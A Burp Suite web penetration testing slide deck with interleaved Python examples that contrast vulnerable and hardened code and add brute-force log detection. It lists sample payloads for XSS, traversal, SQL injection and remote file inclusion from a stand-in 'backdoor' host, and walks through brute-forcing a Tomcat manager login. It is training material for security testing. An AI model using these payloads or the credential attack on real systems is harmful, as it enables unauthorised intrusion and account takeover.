
Web Hacking With Burp Suite 101

In this talk, we’ll walk through utilizing one of the most popular web vulnerability testing frameworks, Burp Suite. During this presentation we will cover the process of conducting a successful web penetration test while utilizing Burp Suite's features and tools (Free and Pro versions). This discussion will also cover realistic examples and a brief overview of common vulnerabilities found in web applications.

Published in: Technology


  1. Introduction to Web App Pentesting & Burp Suite 101
  2. Build | Protect | Learn: Agenda
     • $whoami
     • Overview of Web App Testing & Vulnerabilities
     • Burp Suite Overview
     • Getting Started With Burp Suite
     • Automated Testing
     • Manual Testing
     • Other Features in Burp
     • Manual Testing Mindset & Example
     • Additional Web Hack Tips N Tricks
     • Useful Resources & Conclusion
  3. ~$ whoami
     • InfoSec Geek
     • Pentester @ BreakPoint Labs (0xcc_labs)
     • Contributor to Primal Security Blog and Podcast
     • @b3armunch (Personal Infosec Twitter)
     • Certification Enthusiast (OSCP, GWAPT, GPEN, etc.)
     • I Love Knowing What’s Going On (emerging vulns, tools, PoC), CTFs, Offensive Security Work, Football and Trying New Beers.
  4. Full Disclosure!
     • ALWAYS test what you’re about to learn in a lab environment or when you have permission!
     • What I cover isn’t everything, but it’s enough to hopefully get you familiar and started with using Burp Suite
  5. I Promise NOOOOO…
  6. Overview
     • Goal: To understand and learn about our “bread & butter” tool (Burp Suite) that we leverage on every web assessment.
     • Motivation: Burp Suite could be one of your foundation tools that you leverage throughout your entire web assessment.
       - Burp provides manual and automated testing capabilities.
       - Burp has a free and a paid-for version (currently $349 per year).
     • Quick Note: Static vs. Dynamic Web Content
       - Static Content: Informational web content that tends to lack user features and capabilities.
       - Dynamic Content: Content that allows for user input to be passed to the server.
  7. Web App Testing Methodologies
     • Having an established testing methodology is an important first step.
     • Create checklists and templates to keep the assessment process consistent and repeatable.
     • Several great methodologies out there:
       - Penetration Testing Execution Standard (PTES)
       - OWASP Testing Guide (OTG) 4.0
       - Web Application Hacker’s Handbook Task Checklist
     • Any great methodology will include both automated and manual testing.
  8. Common Web Vulnerabilities
     • Cross-Site Scripting (XSS): When an attacker can embed scripts in a page that execute client-side (in the user’s web browser).
       <script>alert("hello")</script>
     • Directory Traversal: Used by an attacker to gain unauthorized access to restricted directories and resources on the web server.
       index.php?q=../../../../../etc/password
     • Cross-Site Request Forgery: An attack that forces an end user to execute unwanted actions on a web application to which the end user is currently authenticated.
       http://testbank.com/transfer.php?acct=BadBob&amount=500
     • Open Redirect Vulnerabilities: An application that takes a parameter and then redirects a user to the manipulated parameter value without any input validation.
       index.php?redirect=https://badboysite.com
  9. Common Web Vulnerabilities
     • SQL Injection: A form of code injection used against data-driven applications, with malicious SQL statements being inserted into a data entry field or parameter value for execution.
       username: admin'-- (Attempts to log you in as the admin user, with the rest of the SQL query being ignored.)
     • Brute Force Attacks: A trial-and-error method used to obtain authentication to a web application (username, password, PIN, etc.).
     • Remote File Inclusion (RFI): The ability to include links to remote files through the exploitation of vulnerable inclusion procedures implemented in the app.
       http://vulnhost.com/index.php?file=http://badboysite.com/backdoor.php
     • Local File Inclusion (LFI): The vulnerability occurs when a page include is not properly sanitized and an adversary can request a file located on the server through a web browser.
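Three of the bugs on these two slides (directory traversal, open redirect, SQL injection) come down to how the server handles a single parameter. The Python below is an added illustration, not code from the slides or from any project: each bug in its vulnerable form next to a hardened form. The document root, the allow-listed host and the in-memory user table are constructed for the example, and the helper names are ours.

```python
"""Vulnerable vs. hardened handling of three parameters from the slides.
Added example; helper names and sample data are constructed, not from any project."""
import os
import sqlite3
from urllib.parse import urlparse


# --- Directory traversal (the slide's q=../../../../../etc/... parameter) --------
def resolve_path_vulnerable(doc_root, requested):
    # Joins the user-supplied value straight onto the document root, so a run of
    # "../" walks out of it. normpath only tidies the string; it does not confine it.
    return os.path.normpath(os.path.join(doc_root, requested))


def resolve_path_hardened(doc_root, requested):
    # Resolve symlinks and ".." first, then require the result to still sit under
    # the document root. Anything that escapes is rejected before any file I/O.
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("requested path escapes the document root")
    return candidate


# --- Open redirect (index.php?redirect=...) ---------------------------------------
def redirect_target_vulnerable(param):
    # Whatever the parameter says is where the user is sent.
    return param


def redirect_target_hardened(param, allowed_hosts=("example-site.com",)):
    # Accept only same-site paths or absolute URLs to an allow-listed host; anything
    # else falls back to "/". Backslashes are refused because browsers treat
    # "/\evil.com" like "//evil.com" (a protocol-relative URL).
    if "\\" in param:
        return "/"
    parsed = urlparse(param)
    if not parsed.scheme and not parsed.netloc and param.startswith("/") and not param.startswith("//"):
        return param
    if parsed.scheme in ("http", "https") and parsed.hostname in allowed_hosts:
        return param
    return "/"


# --- SQL injection (username: admin'--) -------------------------------------------
def make_demo_db():
    # Constructed in-memory table. A plaintext password is used only to keep the
    # demo short; a real store holds salted hashes.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn


def login_vulnerable(conn, username, password):
    # String-built query: admin'-- closes the quote and comments out the password check.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_hardened(conn, username, password):
    # Parameterized query: the quote and the comment marker are just data.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    print(resolve_path_vulnerable("/var/www/html", "../../../../../etc/passwd"))
    print(redirect_target_hardened("https://badboysite.com"))
    db = make_demo_db()
    print(login_vulnerable(db, "admin'--", "wrong"), login_hardened(db, "admin'--", "wrong"))
```

The hardened redirect check is deliberately an allow-list rather than a deny-list: testing for "badboysite.com" would miss userinfo tricks such as https://example-site.com@badboysite.com/, which urlparse reports with hostname badboysite.com and which the allow-list rejects.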
  10. Web App Testing Procedure
     1) Scoping: Getting the lay of the land through a questionnaire or conference call. (Always document, though.)
     2) Recon & Mapping: What’s the size of the applications and which technologies do they use? (Spidering, Mapping and OSINT)
     3) Automated Testing: Scan All The Things! (Utilizing automated scanners and open source testing tools too)
     4) Manual Testing: Enumerate potential areas of interest and validate any automated tool findings (Abuse features, test injection points and reduce false positives)
     5) Reporting: Essentially putting all your hard work into one document.
     6) Remediation & Review: Provide support and re-testing of findings once remediated
  11. Burp Suite Overview
     Often Burp will be leveraged for its interception proxy capabilities.
     • Proxy: Intercept, capture and log requests
     • Spider: Discover linked content
     • Scanner: Active web app vulnerability scanner
     • Intruder: Automate your testing through injection points
     • Repeater: Take a request and manipulate it to analyze the response further
     • Sequencer: Analyze tokens (Are they randomly generated?)
     • Encoder/Decoder: Encode or decode strings (URL, Base64, HTML)
     • Comparer: Take two things and compare them side by side
     • Extender: TONS of extensions to expand the features in Burp
  12. So Enough Talk….Let’s Actually Learn How to Use Burp! Let’s Begin
  13. Launching Burp
     • Burp Suite is a Java jar file that can either be double-clicked or run from the CLI. The following syntax can launch Burp:
       java -jar -Xmx1024m burpsuite.jar
  14. Burp’s Proxy
     • Burp’s proxy is an intercepting proxy server that operates as a man-in-the-middle between your browser and the target web application.
  15. Setting Up Your Browser
  16. Burp’s Proxy Settings
  17. Common Issue….
  18. Define Your Scope
  19. Map Your App (Click through)
     • Understand the app’s purpose
     • What features are allowed?
     • Can you sign in?
     • View the source
     • Observe the file and directory structure
     • What technologies are in use? (Wappalyzer)
     • Is information being displayed that I can control?
     • Does the app appear to interact with a database?
  20. Spider (Linked Content)
  21. Building Your Site Map
     The Site Map tree view contains a hierarchical representation of content, with URLs broken down into domains, directories, files, and parameterized requests.
  22. Spider (Linked Content)
  23. Filter Content In Your Site Map
  24. Filtering Can Lead to…
     • Client-side comments (Easter eggs the developer left behind!)
     • Email addresses (Potentially leveraged for logins)
     • Internal path disclosure
     • Unlinked files or paths
     • Potentially usernames and passwords (not very likely)
     • Technology enumeration
  25. Analyze Your Target
  26. Target Analyzer Summary
     • Static Content: Essentially content that could be considered “flat files”, meaning what you see is what you get! Often static content is used to present end users news or information.
     • Dynamic Content: Allows for user interaction and communicates with “back end” or “server-side” requests from the application. Think of a search engine or login form.
  27. HTTP History & Comments
  28. Automated Testing
  29. Automated Testing Will Miss Stuff
     • The DHS National NCATS organization reported that 67% of high-impact vulnerabilities required manual testing to enumerate.
  30. Automated Testing Can Break Stuff
  31. Automated Testing Can Take a Long Time
  32. Automated Testing Can Have False Positives
     • Burp: Right-Click -> [Send to Repeater] [Request in Browser]
  33. Burp’s Automated Scan Wizard
  34. Burp’s Automated Scan Queue
  35. Burp’s Automated Scan Results
  36. Generate a Burp Scan Report
  37. Burp Automated Scan Report
     • The Burp Scanner report will include: Finding Issue Details, Severity, Confidence, Request, Response, etc...
  38. Automated Testing
  39. Some Things To Think About
     • What technology is in use?
     • Ensure that you properly mapped the application
     • Enumerate all technology features (File upload, Comments, etc.)
     • Enumerate all areas of user input ("Injection Points")
     • Can you figure out what is being done with your input?
     • Is your input being presented on the screen? -> XSS
     • Is your input calling on stored data? -> SQLi
     • Does input generate an action to an external service? -> SSRF
     • Does your input call on a local or remote file? -> File Inclusion
     • Does your input end up on the file system? -> File Upload
     • Think OWASP Top TEN….
  40. OWASP Top Ten Snapshot
     Source: https://www.owasp.org/index.php/Top_10_2013-Top_10
  41. Analyze Scan Results > Repeater (1)
  42. Test, Modify & Repeat
  43. Analyze Scan Results > Repeater (2)
  44. Verify Results (XSS Example - False Positive)
  45. Verify Results (XSS Example - Successful)
  46. Think About How Input Is Being Used
     Think about how to attack the following parameters and their values:
     http://example-site.com/index.php?redirect=/contact/contact-us.php
     http://example-site.com/index.php?file=/app/load.php
     http://example-site.com/index.php?name=zack
     http://example-site.com/index.php?search=exploitdb
     http://example-site.com/index.php?sql=SELECT * FROM USERS
  47. Burp’s Intruder
  48. Custom Fuzzing
     • FuzzDB, RAFT lists, and SecLists provide great lists for custom fuzzing.
     • As you start to understand how your input is being leveraged you can start your fuzzing in an automated manner.
     • Burp Suite Pro’s Intruder is my go-to tool for web application fuzzing.
  49. Unlinked Content Treasures!
     • Use Burp’s pre-built payload lists for fuzzing (Intruder, Pro version only)
     • Use commonly known lists from tools like DirBuster or Wfuzz (We can enable Burp to add any new findings to our site map!)
     • Use the “SecLists” collection and its lists broken down by the following:
       - Passwords
       - Usernames
       - Discovery (Collection of general and specified directories/resources)
       - Fuzzing (Collection of various payloads sorted by attack type)
       - Miscellaneous (Common ports, file extensions, list of US cities, etc.)
       - Pattern Matching (Good for the grep utility through file contents)
       - IOCs (Indicators of compromise: malicious domains, IPs, files, etc.)
       - New Feature: RobotsDisallowed (Disallowed directories from the robots.txt files of the world's top websites, specifically the Alexa 100K.)
       Source: https://github.com/danielmiessler/SecLists
  50. Define Your Intruder Method
     • Sniper – Sends a single set of payloads to the selected parameter value(s) to identify vulnerabilities.
     • Battering Ram – Sends a single payload to all marked positions at once. It iterates through the payloads and places the same payload into all of the defined payload positions at once.
     • Pitchfork – Sends a specific payload set to each of the selected parameters in sequence. Each area of interest is passed its own designated values in a sequenced series of requests.
     • Cluster Bomb – All payloads are tested with all the variables given, meaning that all permutations of payload combinations are tested. (WARNING: this is often the largest and longest attack method)
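The four attack types differ only in how payload sets are mapped onto marked positions, which is easier to see in code than in prose. The Python below is an added model of the slide's descriptions, not Burp's own code; the base request, the two positions and the payload sets are constructed. Its practical use is the request count: the numbers show why cluster bomb is the mode the slide warns about, and they are what you would use to size a run against whatever rate limiting or lockout the target has (which is also what a defender tuning those controls wants to know).

```python
"""Model of Burp Intruder's four attack types over named payload positions.
Added example with constructed data; it follows the slide's descriptions, not Burp's source."""
from itertools import product


def intruder_requests(base, payload_sets, mode):
    """Yield one dict of position -> value per request the attack type would send.

    base          constructed starting value for each marked position, in order
    payload_sets  one list per payload set (sniper and battering ram use only the first)
    mode          "sniper" | "battering_ram" | "pitchfork" | "cluster_bomb"
    """
    positions = list(base)
    if mode == "sniper":
        # One position at a time; the other positions keep their base values.
        for pos in positions:
            for payload in payload_sets[0]:
                yield {**base, pos: payload}
    elif mode == "battering_ram":
        # The same payload dropped into every position at once.
        for payload in payload_sets[0]:
            yield {pos: payload for pos in positions}
    elif mode == "pitchfork":
        # Set N feeds position N; requests stop when the shortest set runs out.
        for combo in zip(*payload_sets):
            yield dict(zip(positions, combo))
    elif mode == "cluster_bomb":
        # Every combination of every set: the product of the set sizes.
        for combo in product(*payload_sets):
            yield dict(zip(positions, combo))
    else:
        raise ValueError(f"unknown attack type: {mode}")


def render(values):
    # Constructed request template with two marked positions, q and page.
    return f"GET /index.php?q={values['q']}&page={values['page']} HTTP/1.1"


def request_count(base, payload_sets, mode):
    return sum(1 for _ in intruder_requests(base, payload_sets, mode))


if __name__ == "__main__":
    base = {"q": "test", "page": "1"}
    sets = [["a", "b", "c"], ["1", "2"]]
    for mode in ("sniper", "battering_ram", "pitchfork", "cluster_bomb"):
        print(mode, request_count(base, sets, mode))
        for values in intruder_requests(base, sets, mode):
            print("  ", render(values))
```

With three payloads in the first set and two in the second, sniper sends 3 per position (6), battering ram 3, pitchfork 2 (the shorter set ends it), and cluster bomb 3 x 2 = 6; with realistic list sizes the product is the only one of the four that explodes.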
  51. Burp’s Intruder: Set Your Position
  52. Define the Intruder Payload List
  53. Intruder’s Results (Status | Length)
     Note: You may want to uncheck payload encoding if not needed!!!!
  54. Burp Pro’s Discover Content (Unlinked)
  55. Burp’s Discover Content Options
  56. Burp’s Discover Content Session Status
  57.
  58. Burp’s Encoder/Decoder
  59. Burp’s Comparer
     Key: Modified | Deleted | Added
  60. Burp’s Sequencer
  61. Burp’s Extender
  62. Manual Testing Mindset & Example
     • Now let’s cover a basic example of how we can compromise a web application through several features that we can abuse!
  63. Weak Authentication Mechanism
     • Very common finding with web application penetration testing
     • Often combines several vulnerabilities:
       - Username Enumeration (Low) +
       - Lack of Automation Controls (Low) +
       - Lack of Password Complexity Requirements (Low) =
       - Account Compromise (Critical)
  64. Weak Authentication: Username Enumeration
     • Password reset features: “Email address not found”
     • Login error messages: “Invalid Username”
     • Timing for login attempts: Valid = 0.4 secs, Invalid = 15 secs
     • User registration: “Username already exists”
     • Various error messages, and HTML source
     • Contact Us features: “Which admin do you want to contact?”
     • Google hacking and OSINT
     • Document metadata
     • Sometimes the application tells you!
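Every signal on this slide comes from the application answering differently depending on whether the username exists. The Python below is an added illustration (not from the slides): a login handler that leaks in both its message and its timing, next to one that answers the same way either way. The user store, salt and PBKDF2 iteration count are constructed for the example.

```python
"""Username enumeration via error message and timing, and the hardened equivalent.
Added example; the user store, salt and iteration count are constructed."""
import hashlib
import hmac
import time

ITERATIONS = 50_000            # constructed; real deployments tune this to their hardware
SALT = b"constructed-salt"     # one salt shared here for brevity; real stores use one per user


def hash_password(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), SALT, ITERATIONS)


# Constructed user store with a single account.
USERS = {"tomcat": hash_password("constructed-secret")}
# Digest of a throwaway value, compared against when the username does not exist,
# so that unknown and known usernames cost the same amount of work.
DUMMY_HASH = hash_password("not-a-real-password")


def login_enumerable(username, password):
    # Leaks twice: a different message for unknown users, and no hashing work for
    # them, so their response comes back measurably faster (the slide's 0.4 s vs 15 s).
    if username not in USERS:
        return "Invalid Username"
    if USERS[username] == hash_password(password):
        return "OK"
    return "Invalid Password"


def login_hardened(username, password):
    # Same generic message on every failure, a hash computed on every attempt, and a
    # constant-time comparison of the digests.
    stored = USERS.get(username, DUMMY_HASH)
    matches = hmac.compare_digest(stored, hash_password(password))
    if matches and username in USERS:
        return "OK"
    return "Invalid username or password"


def timing_gap(login_fn, known_user, unknown_user, password="guess"):
    """Seconds by which the unknown-user attempt is faster than the known-user one.
    Clearly positive for login_enumerable; close to zero for login_hardened."""
    start = time.perf_counter()
    login_fn(known_user, password)
    known = time.perf_counter() - start
    start = time.perf_counter()
    login_fn(unknown_user, password)
    unknown = time.perf_counter() - start
    return known - unknown


if __name__ == "__main__":
    for fn in (login_enumerable, login_hardened):
        print(fn.__name__, fn("nobody", "guess"), "|", fn("tomcat", "guess"),
              "| gap %.4fs" % timing_gap(fn, "tomcat", "nobody"))
```

The `username in USERS` check in the hardened path is evaluated after the hash, so it adds no measurable time; it exists so that guessing the dummy value can never log anyone in. Password reset and registration endpoints need the same treatment (one message, one code path) or the login fix buys nothing.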
  65. Weak Authentication: Automation Controls
     • Pull the authentication request up in Burp’s Repeater and try it a few times.
     • If you see no sign of automation controls, send it to Burp’s Intruder for more aggressive testing.
       - No account lockout
       - No/weak CAPTCHA
       - Main login is strong, but other resources are not (Mobile interface, API, etc.)
  66. Weak Authentication: Weak Passwords
     • We as humans are bad at passwords…here are some tricks that work for me:
       - Password the same as username
       - Variations of “password”: “p@ssw0rd”…
       - Month+Year, Season+Year: summer2016…
       - Company Name + year
       - Keyboard Walks – PW Generator: “!QAZ2wsx”
       - My favorites…Burp Pro’s built-in wordlist or SecLists password files
     • Lots of wordlists out there; consider making a targeted wordlist using CeWL (scrape sites for unique keywords).
     • Research the targeted user’s interests and build lists around those interests.
  67. Piecing Together What We Know…
     • We have enumerated that there’s a valid account named “tomcat” from the password reset functionality in the forms-based login (also a default account for Apache Tomcat).
     • The application also has basic authentication protecting its “tomcat manager” login on port 8080 (no lockout built in, and we will need to base64-encode payloads).
     • We know there’s a lack of password complexity, since we made a test account with a password of “password”. (create account feature abuse)
     • Let’s leverage Burp’s Intruder to brute force…
  68. Manipulating Our Target Request
     1. View our HTTP History under the Proxy tab.
     2. Find our HTTP request for the Tomcat ‘/manager/html’ login resource.
     3. Send our request to Burp’s Intruder.
  69. Burp Intruder Payload Configuration
     4. Add the § Payload Markers § around the Basic Authorization value with the Sniper attack.
  70. Analyze Your Encoded Payload
     To provide further context, let’s decode our sample login attempt to the Tomcat login > Send to Burp’s Decoder > Base64 Decode, and we can see our attempt in plaintext, i.e. tomcat:password
  71. Burp Intruder Payload Set Up
     5. Custom Iterator and Position 1 Set
     6. Set Position 1 Separator “:”
     7. Set Position 2 Password List
  72. Payload Processing: Base64 Encode
     8. Add a Payload Processing Rule > Encode > Base64-encode your payload > Properly submits our brute force attempts!!!
  73. Start Intruder & Review Results
     9. Look for a variance in your HTTP status or length of response from your payload attempts.
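Two defender-side counterparts to steps 4 through 9, as an added Python example that is not part of the slides. The first function does what slide 70 does in Burp's Decoder, turning a Basic Authorization value back into user:password, which is the reason Basic auth must only ever travel over TLS. The second shows what the whole run looks like from the server side: in Tomcat's access log it is a burst of 401s from one client against /manager/html, followed by a 200 when a guess lands. The log lines are constructed in Tomcat's common AccessLogValve pattern; the threshold and window are assumptions.

```python
"""Decode a Basic Authorization value, and flag a credential brute-force burst
against /manager/html in Tomcat access logs. Added example with constructed log lines."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed lines in Tomcat's "common" AccessLogValve pattern (%h %l %u %t "%r" %s %b).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2016:13:55:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2016:13:55:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2016:13:55:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.7 - - [10/Oct/2016:13:55:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2016:13:55:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2016:13:55:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2016:13:55:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.7 - admin [10/Oct/2016:13:55:09 +0000] "GET /manager/html HTTP/1.1" 200 19844
10.0.0.5 - tomcat [10/Oct/2016:13:55:05 +0000] "GET /manager/html HTTP/1.1" 200 19844
10.0.0.9 - - [10/Oct/2016:13:57:10 +0000] "GET /index.html HTTP/1.1" 200 1120
"""

LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def decode_basic_auth(header_value):
    """Turn 'Basic dG9tY2F0OnBhc3N3b3Jk' back into ('tomcat', 'password'): base64 is
    an encoding, not encryption, so the header is plaintext to anyone on the path."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic Authorization value")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, user, stamp, method, path, status, _ = m.groups()
    return {"ip": ip, "user": user, "method": method, "path": path,
            "status": int(status),
            "time": datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")}


def find_bruteforce(log_text, path_prefix="/manager", threshold=5, window=timedelta(minutes=1)):
    """Per client IP: the largest number of 401s against path_prefix inside any
    `window`, and whether a 200 followed the burst (a likely successful guess).
    threshold and window are assumptions for the example."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith(path_prefix):
            by_ip[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        fails = [r["time"] for r in recs if r["status"] == 401]
        peak, start = 0, 0
        for end in range(len(fails)):              # sliding window over failure times
            while fails[end] - fails[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_fail = fails[-1]
            alerts[ip] = {
                "max_failures_in_window": peak,
                "success_after_burst": any(r["status"] == 200 and r["time"] >= last_fail
                                           for r in recs),
            }
    return alerts


if __name__ == "__main__":
    print(decode_basic_auth("Basic dG9tY2F0OnBhc3N3b3Jk"))
    print(find_bruteforce(SAMPLE_LOG))
```

On the sample, 10.0.0.7 (one failed attempt, then success) is left alone while 10.0.0.5 is flagged with six failures and a success after the burst; the same rule, fed by the real log, is the lockout the slide says this manager interface lacks, applied after the fact. The remote-host field is the client as Tomcat saw it, so behind a reverse proxy key on the forwarded client address instead.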
  74. ACHIEVEMENT UNLOCKED!!!!
  75.
  76. Reconnaissance: Identify New Systems and Content
     • Companies are normally quite surprised about what is exposed to the Internet.
     • How do you tackle large /8s and /16s, and how do you even build out this footprint starting with a company name?
       - Shodan + Censys.io (3rd-party DBs with port/service info)
       - Domain + IP research (host, dig, whois, etc.)
       - Masscan + Nmap (Identify open ports and services)
       - WhatWeb + Wappalyzer (ID tech stack)
       - Google, Bing, etc. (Search syntax)
       - OSINT: Company mergers + acquisitions (Expand scope?)
  77. Big Scope? Quick Visual: EyeWitness
     • EyeWitness is a tool that takes in URLs and creates a report with server headers + a screenshot of the web GUI
     • Extremely useful when facing a large scope
  78. Don’t Judge a System By Its IP
     • Requesting an application URL by IP might give back different content vs. the domain.
     • Load balancing could exist where an application is mirrored across several IP addresses (commonly seen with large sites, i.e. banks).
     • Keep in mind you can have several applications living on the same IP (virtual hosting).
     • Pointing an automated tool to “http://ip/” may miss a lot of stuff vs. “http://ip/AppIsHere/”.
  79. Shot in the Dark “Nikto” Scan
     • Open source web application vulnerability scanner that checks for low-hanging-fruit vulnerabilities and some old goodies. (False positives will happen!)
  80. Version Specific Vulnerabilities
     • Enumerating the technology and version in use goes a long way with finding vulnerabilities (Google + Exploit-DB)
     • What do I know about the technology and how can I find more information?
  81. Build Your Own Custom Report
     • We leverage Markdown for custom reporting to give our reports in an HTML format.
     • Common Findings Database - Check it out
  82. Useful Resources
     • CTFs: Vulnhub, Past CTF Writeups, Pentester Lab
     • Training: GWAPT, Offensive Security
     • Book: Web Application Hacker’s Handbook
     • Talk: How to Shot Web - Jason Haddix
     • Talk: How to be an InfoSec Geek - Primal Security
     • Talk: File in the hole! - Soroush Dalili
     • Talk: Polyglot Payloads in Practice - Marcus Niemietz
     • Talk: Running Away From Security - Micah Hoffman
     • GitHub Resource: Security Lists For Fun & Profit
     • BPL Blog Post on this Talk:
  83. Conclusion
     Email: zmeyers@breakpoint-labs.com
     • Burp Suite is a great baseline tool to leverage in all your future web assessments.
     • OWASP has a large abundance of information to reference and learn from.
     • Read blogs and Twitter whenever possible; often dozens of web vulnerabilities and potential exploits are released every day.
